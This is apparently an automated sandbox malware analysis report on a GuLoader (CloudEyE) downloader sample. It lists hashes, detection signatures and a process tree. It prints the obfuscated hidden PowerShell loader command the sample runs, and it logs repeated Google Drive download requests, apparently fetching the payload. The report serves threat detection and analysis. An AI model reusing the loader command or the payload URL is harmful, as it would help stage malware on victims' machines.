Windows Analysis Report
av8XPPpdBc.exe

Overview

General Information

Sample name:av8XPPpdBc.exe
renamed because original name is a hash value
Original sample name:a86c116c881fc184302b73c91a25e0bf0a8952971815891def98b50ff3c7e7d1.exe
Analysis ID:1588780
MD5:21f092b643089f4c05d3257430075a65
SHA1:e54525e972627916bac452001cd2f5a5e75c650d
SHA256:a86c116c881fc184302b73c91a25e0bf0a8952971815891def98b50ff3c7e7d1
Tags:exe, user-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • av8XPPpdBc.exe (PID: 6720 cmdline: "C:\Users\user\Desktop\av8XPPpdBc.exe" MD5: 21F092B643089F4C05D3257430075A65)
    • powershell.exe (PID: 5072 cmdline: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Autocueing.exe (PID: 5140 cmdline: "C:\Users\user\AppData\Local\Temp\Autocueing.exe" MD5: 21F092B643089F4C05D3257430075A65)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000002.00000002.2530768595.00000000094D4000.00000040.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: 00000008.00000002.3393778928.0000000001764000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security

      System Summary

      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) ", CommandLine: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\av8XPPpdBc.exe", ParentImage: C:\Users\user\Desktop\av8XPPpdBc.exe, ParentProcessId: 6720, ParentProcessName: av8XPPpdBc.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Vordingborg133=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers\Negeringsfunktioners209.Thi';$prepenial=$Vordingborg133.SubString(71057,3);.$prepenial($Vordingborg133) ", ProcessId: 5072, ProcessName: powershell.exe
      Timestamp: 2025-01-11T05:28:00.626428+0100, SID: 2803270, Severity: 2, Classtype: Potentially Bad Traffic, Source IP: 192.168.2.6, Source Port: 49942, Destination IP: 142.250.185.142, Destination Port: 443, Protocol: TCP

      AV Detection

      Source: C:\Users\user\AppData\Local\Temp\Autocueing.exe, ReversingLabs: Detection: 62%
      Source: av8XPPpdBc.exe, Virustotal: Detection: 48%
      Source: av8XPPpdBc.exe, ReversingLabs: Detection: 62%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: av8XPPpdBc.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49942 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.6:49948 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49997 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49999 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50005 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50009 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50019 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50021 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50025 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50031 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50035 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50046 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50050 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: av8XPPpdBc.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: e.pdbd< source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp
      Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000002.00000002.2527735231.00000000085DD000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\av8XPPpdBc.exe, Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
      Source: C:\Users\user\Desktop\av8XPPpdBc.exe, Code function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
      Source: C:\Users\user\Desktop\av8XPPpdBc.exe, Code function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49942 -> 142.250.185.142:443
      Source: global traffic, HTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Host: drive.google.com, Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0, Cache-Control: no-cache, Host: drive.usercontent.google.com, Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
